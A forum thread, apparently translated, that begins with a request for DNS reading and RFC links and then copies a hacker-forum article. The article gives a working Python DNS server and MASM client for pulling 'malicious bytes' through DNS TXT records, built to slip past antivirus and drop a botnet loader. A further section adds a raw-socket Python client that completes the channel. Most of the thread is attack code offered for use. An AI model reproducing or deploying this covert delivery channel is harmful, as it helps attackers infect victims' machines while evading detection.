Topic: Where to read about DNS?

Where can I read about DNS? I need a detailed description of the protocols, including setting up my own server. I don't understand the source code - http://lockboxx.blogspot.com/2015/01/py … shell.html

Thanked by (1): leofun01


Re: Where to read about DNS?

Three dozen RFCs: https://tools.ietf.org/html/rfc1035

Thanked by (3): leofun01, 0xDADA11C7, HetmanNet


Re: Where to read about DNS?

In general, at what level are you planning to work with DNS? In the linked code all the work is handed off to the dns.resolver library, and you seem to need something deeper.

Thanked by (2): leofun01, 0xDADA11C7

Last edited by reverse2500 (03.08.2020 11:20:24)

Re: Where to read about DNS?

Good afternoon. There are quite a few DNS servers too; the most widespread is BIND.
DNSSEC Project Archive
RFC 5011 - Automated Updates of DNS Security (DNSSEC) Trust Anchors

Thanked by (2): leofun01, 0xDADA11C7


Re: Where to read about DNS?

If at a low level: https://firststeps.ru/protocol/dns/dns1.html

Take a look at hackforums; there was an article with source code (in MASM) plus a server in Python. If you can't find it, I'll send it to you by PM in the evening.

Thanked by (5): koala, Chemist-i, leofun01, 0xDADA11C7, reverse2500


Re: Where to read about DNS?

If anyone is still interested, here is the article promised above:

link to the English-language forum

Registration is required, or login through some service like Google/Facebook/GitHub.

Thanked by (1): 0xDADA11C7


Re: Where to read about DNS?

Previously hackforums didn't let you in from Ukraine at all.


Re: Where to read about DNS?

So I take it that without registration you can't read anything there?


Re: Where to read about DNS?

Yes, you need to use a VPN; I just always sit behind one, otherwise CIS IPs aren't let in. Here's that article, copying it here:

Download-to-disk-and-execute is dead; every AV and your grandmother can detect someone making an HTTP transaction and then dropping to disk.

Bypass HTTP entirely, bypass disk entirely.

Enter DynamicNet, a MASM PoC (full concept coming soon) that uses DNS TXT records to transmit data to a machine without touching the disk or even sending a single HTTP packet. Perfect for a basic loader that needs to drop your awesome botnet without arousing too much suspicion, such as disk activity or HTTP requests.

"How exactly does this work?"
DynamicNet uses two programs: a server written in Python to pass your malicious bytes to the client, and a client in MASM (could be ported to .NET if you hate yourself) to retrieve your malicious bytes. As it stands, the basic PoC binary compiles to 2.5 KB without any optimization, so that's awesome.

"Why is this any better than using a direct socket connection?"
Your average AV is going to see opening any sort of socket as a huge flag from a heuristic standpoint. DynamicNet uses the nslookup command, which is built into Windows, to make the request; since nslookup is installed by default and is used by many applications to fetch DNS information, the call to it looks routine to an AV.

"gib source!"
1. Run the simple Python script on a server (ideally Linux with a public IP); make sure to edit line 38 to reflect your "malicious" bytes.
2. Edit line 14 in the MASM code to include the IP of the server from step 1.
3. Compile the MASM code.
4. Run the MASM binary.
5. Enjoy the show.

More will be coming from this soon, maybe a real loader/crypter via DNS if I'm feeling up to it.

Python script

# Python 3 version of the posted (truncated, Python 2) server. It answers every
# standard query with a single TXT record containing the configured string.
import socket
import struct


class DNSQuery:
    """Parse one DNS query and build a single-record TXT answer for it."""

    def __init__(self, data):
        self.data = data
        self.domain = ''
        self.question_end = 12                 # offset just past the question section
        opcode = (data[2] >> 3) & 15           # Opcode bits of the flags
        if opcode == 0:                        # Standard query: walk the QNAME labels
            pos = 12
            length = data[pos]
            while length != 0:
                self.domain += data[pos + 1:pos + 1 + length].decode('ascii', 'replace') + '.'
                pos += length + 1
                length = data[pos]
            self.question_end = pos + 1 + 4    # root label, then QTYPE and QCLASS

    def ReplyTXT(self, reply_string):
        packet = b''
        if self.domain:
            reply = reply_string.encode('latin-1')
            reply_length = len(reply)
            if reply_length > 255:             # one TXT <character-string> holds at most 255 bytes
                raise ValueError('TXT string too long; split it into several character-strings')
            packet += self.data[:2] + b'\x81\x80'                            # ID; flags: response, RD, RA
            packet += self.data[4:6] + self.data[4:6] + b'\x00\x00\x00\x00'  # QDCOUNT, ANCOUNT=QDCOUNT, NSCOUNT, ARCOUNT
            packet += self.data[12:self.question_end]                        # original question only (drops any EDNS OPT record)
            packet += b'\xc0\x0c'                                            # pointer to the domain name at offset 12
            packet += b'\x00\x10\x00\x01\x00\x00\x00\x3c'                    # TYPE TXT, CLASS IN, TTL 60
            packet += struct.pack('>H', reply_length + 1)                    # RDLENGTH: length byte + text
            packet += bytes([reply_length])                                  # TXT length is ONE byte (the original packed ">h", two bytes)
            packet += reply                                                  # TXT
        return packet


if __name__ == '__main__':
    print('DynamicDNS Server Active')

    udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udps.bind(('', 53))                        # UDP/53 needs root or CAP_NET_BIND_SERVICE
    log_file = open('DynamicDNS_Log.txt', 'a')
    hello_string = 'Put Your Malicious Bytes Here'
    try:
        while 1:
            data, addr = udps.recvfrom(1024)
            if len(data) < 12:                 # shorter than a DNS header: ignore
                continue
            query = DNSQuery(data)
            udps.sendto(query.ReplyTXT('@' + hello_string + '@'), addr)
            print('Request: %s Replied With: %s' % (query.domain, hello_string))
            log_file.write('Request:  ' + query.domain + ' Replied With ' + hello_string + '\n')
    except KeyboardInterrupt:
        print('Exiting...')
    finally:
        log_file.close()
        udps.close()

MASM client

; Reconstructed from the posted (truncated) listing: the missing segment directives,
; .endif/.endw terminators, labels and locals are restored; nothing else is changed
; except the STARTUPINFO flags and NUL-termination of the pipe buffer, without which
; the capture of nslookup output does not work.
.386
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc

includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib

.data
lookupcmd db "nslookup -type=txt not_a_real_domain <server ip goes here>",0 ;Edit me or I wont work

.data?
pipe_read    dd ?
pipe_write   dd ?
bwr          dd ?                   ;bytes read from the pipe
buffer       db 1024 dup(?)         ;raw nslookup output
parsedbuffer db 1024 dup(?)         ;text between the first pair of '@' markers

.code
;Splitting up strings example, borrowed from http://tinyurl.com/d8gunp4
;Copies field number wrd (0-based) of string, split on brk, into buff.
;eax = length of the field, or -1 if it does not exist / a pointer is null.
GetWord proc uses esi edi ebx string:DWORD,wrd:DWORD,brk:BYTE,buff:DWORD,buffsize:DWORD
    local rett:DWORD
    .if string!=0 && buff!=0
        xor edx,edx                 ;edx=wordcnt
        mov esi,string
        mov bl,[esi]
        call skipBrk
        .while bl!=0
            .if bl==brk
                inc edx
                call skipBrk
            .endif
            .break .if edx==wrd || bl==0
            inc esi
            mov bl,[esi]
        .endw
        .if bl!=0
            mov edi,buff
            xor ecx,ecx
            dec buffsize
            .while bl!=0 && bl!=brk && ecx<buffsize
                mov bl,[esi]
                mov [edi],bl
                inc ecx
                inc esi
                inc edi
            .endw
            dec ecx
            mov byte ptr [edi-1],0  ;overwrite the copied brk/NUL with the terminator
            mov rett,ecx
        .else
            mov rett,-1             ;word doesnt exist
        .endif
    .else
        mov rett,-1                 ;one or more string parameters are null
    .endif
    mov eax,rett
    ret
skipBrk:                            ;local subroutine: advance esi past consecutive brk bytes
    .while bl==brk && bl!=0
        inc esi
        mov bl,[esi]
    .endw
    db 0c3h                         ;plain ret: reached by call, so no proc epilogue wanted
GetWord endp

finished proc
    invoke GetWord, addr buffer,1,"@",addr parsedbuffer,sizeof parsedbuffer
    invoke MessageBox,0,addr parsedbuffer,0,0
    ;Take contents of parsedbuffer and reflect into your 133t RunPE for xXx420botnetxXx
    invoke ExitProcess,0
finished endp

StartFunction proc
;Killer pipe explanation from berniee/[Xero]
local security_attrib :SECURITY_ATTRIBUTES
local stinfo          :STARTUPINFO
local pinfo           :PROCESS_INFORMATION

    mov security_attrib.nLength,sizeof SECURITY_ATTRIBUTES
    mov security_attrib.lpSecurityDescriptor,0
    mov security_attrib.bInheritHandle,TRUE          ;child must inherit the write end

    invoke CreatePipe,addr pipe_read,addr pipe_write,addr security_attrib,0

    invoke RtlZeroMemory,addr stinfo,sizeof STARTUPINFO
    mov stinfo.cb,sizeof STARTUPINFO
    mov stinfo.dwFlags,STARTF_USESTDHANDLES or STARTF_USESHOWWINDOW ;without these flags the handles below are ignored
    mov eax,pipe_write
    mov stinfo.hStdOutput,eax
    mov stinfo.hStdError,eax
    mov stinfo.wShowWindow,SW_HIDE

    invoke CreateProcess,0,addr lookupcmd,0,0,TRUE,0,0,0,addr stinfo,addr pinfo
    invoke CloseHandle,pipe_write   ;drop our copy so ReadFile fails once nslookup exits

pipeloop:
    invoke ReadFile,pipe_read,addr buffer,sizeof buffer - 1,addr bwr,0
    .if eax == 0                    ;broken pipe: nslookup is done, parse the last chunk
        invoke finished
    .endif
    mov eax,bwr
    mov buffer[eax],0               ;NUL-terminate the chunk for GetWord
    jmp pipeloop
StartFunction endp

LogicStart:
    invoke StartFunction
    invoke ExitProcess,0
end LogicStart

The asm code is busted; you need to use your own socket implementation rather than third-party programs, but I don't think writing a client is a problem.

Thanked by (1): 0xDADA11C7
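The last post asks for a client that speaks DNS over its own socket instead of shelling out to nslookup. The following Python 3 script is an added example, not code from the quoted article or from anyone in this thread: it encodes a TXT query by hand (RFC 1035 header and question section), sends it over UDP, and walks the response, following name-compression pointers, skipping the echoed question, and pulling every <character-string> out of each TXT record in the answer section. The extract_marked_payload helper reproduces the selection that GetWord(buffer, 1, "@", ...) performs in the MASM client. The fixed transaction ID 0x1234, the name not_a_real_domain (taken from the MASM command line) and the SAMPLE_RESPONSE bytes are all constructed here for the offline run.

```python
import socket
import struct

TXID = 0x1234   # fixed transaction ID for this example; real code should randomize it


def build_txt_query(name, txid=TXID):
    """Encode a standard query for TXT records of `name` (RFC 1035, section 4.1)."""
    header = struct.pack('>HHHHHH', txid, 0x0100, 1, 0, 0, 0)   # flags 0x0100: RD set
    qname = b''
    for label in name.strip('.').split('.'):
        raw = label.encode('ascii')
        if not 0 < len(raw) < 64:
            raise ValueError('label must be 1-63 bytes: %r' % label)
        qname += bytes([len(raw)]) + raw
    return header + qname + b'\x00' + struct.pack('>HH', 16, 1)  # QTYPE=TXT, QCLASS=IN


def read_name(msg, pos):
    """Decode a name at `pos`, following compression pointers; return (name, offset after it)."""
    labels, resume, hops = [], None, 0
    while True:
        length = msg[pos]
        if length & 0xC0 == 0xC0:                        # two-byte pointer (RFC 1035, 4.1.4)
            if resume is None:
                resume = pos + 2                         # caller continues after the first pointer
            pos = struct.unpack('>H', msg[pos:pos + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError('compression pointer loop')
            continue
        pos += 1
        if length == 0:
            break
        labels.append(msg[pos:pos + length].decode('ascii', 'replace'))
        pos += length
    return '.'.join(labels) + '.', (pos if resume is None else resume)


def parse_txt_answers(msg, expected_txid=None):
    """Return every <character-string> carried by TXT records in the answer section."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack('>HHHHHH', msg[:12])
    if expected_txid is not None and txid != expected_txid:
        raise ValueError('transaction ID mismatch (spoofed or stale reply?)')
    if not flags & 0x8000:
        raise ValueError('QR bit clear: this is a query, not a response')
    if flags & 0x000F:
        raise ValueError('server returned RCODE %d' % (flags & 0x000F))
    pos = 12
    for _ in range(qdcount):                             # skip the echoed question(s)
        _, pos = read_name(msg, pos)
        pos += 4                                         # QTYPE, QCLASS
    texts = []
    for _ in range(ancount):
        _, pos = read_name(msg, pos)
        rtype, rclass, _ttl, rdlength = struct.unpack('>HHIH', msg[pos:pos + 10])
        pos += 10
        rdata = msg[pos:pos + rdlength]
        pos += rdlength
        if rtype == 16 and rclass == 1:                  # TXT, IN
            off = 0
            while off < len(rdata):                      # RDATA is one or more <character-string>s
                n = rdata[off]
                texts.append(rdata[off + 1:off + 1 + n].decode('latin-1'))
                off += 1 + n
    return texts


def extract_marked_payload(texts, marker='@'):
    """Same selection as GetWord(buffer, 1, "@", ...) in the MASM client: text between the first two markers."""
    parts = ''.join(texts).split(marker)
    return parts[1] if len(parts) > 2 else None


def query_txt(name, server, timeout=3.0):
    """Send the query over our own UDP socket (no nslookup) and return the TXT strings."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_txt_query(name), (server, 53))
        response, _ = sock.recvfrom(4096)
    return parse_txt_answers(response, expected_txid=TXID)


# Constructed sample response (not captured from a real server), laid out the way the
# server script above answers: header, echoed question, one TXT RR with a name pointer to offset 12.
SAMPLE_RESPONSE = (
    b'\x12\x34\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00'   # ID 0x1234, flags 0x8180, QD=1, AN=1
    + b'\x11not_a_real_domain\x00' + b'\x00\x10\x00\x01'  # QNAME, QTYPE=TXT, QCLASS=IN
    + b'\xc0\x0c' + b'\x00\x10\x00\x01\x00\x00\x00\x3c'   # NAME pointer, TYPE TXT, CLASS IN, TTL 60
    + b'\x00\x0e' + b'\x0d@hello,world@'                   # RDLENGTH=14, one 13-byte character-string
)

if __name__ == '__main__':
    import sys
    if len(sys.argv) == 3:                                # usage: client.py <name> <server ip>
        print(extract_marked_payload(query_txt(sys.argv[1], sys.argv[2])))
    else:                                                 # offline: decode the constructed sample
        print(extract_marked_payload(parse_txt_answers(SAMPLE_RESPONSE, TXID)))
```

Run it with no arguments to decode the constructed sample, or with a name and the server's IP to query the Python server from the post. The transaction-ID and QR/RCODE checks are the minimum a client should do before trusting a UDP reply; anything on the path can answer on port 53.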